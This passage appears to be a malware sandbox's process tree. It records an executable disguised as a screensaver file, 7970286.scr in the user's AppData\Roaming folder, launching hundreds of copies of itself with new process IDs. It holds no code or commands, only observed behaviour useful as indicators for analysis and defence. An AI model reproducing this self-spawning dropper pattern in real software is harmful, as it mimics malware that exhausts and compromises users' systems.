C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6900
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6932
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6940
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6948
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6980
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7016
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7032
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7048
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7064
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7096
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7116
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7132
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7148
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7164
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6328
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6500
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2104
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5644
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6640
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7172
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7180
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7212
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7244
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7260
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7276
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7292
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7308
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7324
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7344
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7360
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7368
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7376
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7408
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7424
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7444
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7460
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7476
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7484
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7492
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7468
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7500
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7508
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7540
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7560
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7592
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7612
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7632
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7648
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7656
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7680
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7688
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7704
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7720
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7752
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7772
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7764
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7780
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7804
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7820
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7812
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7796
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7788
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7744
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7728
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7712
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7696
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7672
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7664
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7836
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7856
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7900
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7920
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7912
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7936
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7956
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7972
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7992
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8008
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8040
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8048
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8088
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8116
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8108
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8144
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8156
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8180
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5992
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6572
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7620
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7864
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7908
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6628
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8140
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1228
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:944
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1752
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1276
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:556
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2272
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7980
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3120
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4404
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8196
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8212
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8228
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8244
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8252
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8280
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8328
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8344
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8376
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8392
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8384
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8408
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8400
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8368
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8360
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8352
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8336
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8320
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8312
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8304
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8296
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8288
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8268
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8260
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8236
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8424
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8440
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8456
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8472
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8488
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8504
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8532
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8544
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8568
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8584
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8600
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8632
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8624
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8616
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8608
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8592
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8576
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8560
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8552
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8516
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8496
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8480
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8464
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8448
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8432
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8416
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8204
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:7548
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8648
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8664
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8680
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8696
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8712
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8728
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8744
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8768
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8784
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8800
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8808
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8848
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8864
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8880
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8896
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8908
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8916
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8948
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8964
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8984
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9016
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9036
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9052
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9060
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9116
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9132
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9124
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9148
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9156
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9172
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9188
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9204
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2512
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4800
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3388
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2428
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:8524
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2788
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9232
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9240
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9264
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9280
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9288
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9296
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9312
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9336
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9348
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9364
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9380
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9396
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9428
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9468
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9488
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9504
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9520
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9536
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9552
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9568
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9576
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9600
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9616
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9656
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9672
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9688
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9696
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9704
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9712
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9720
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9740
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9748
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9772
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:9804
-
-
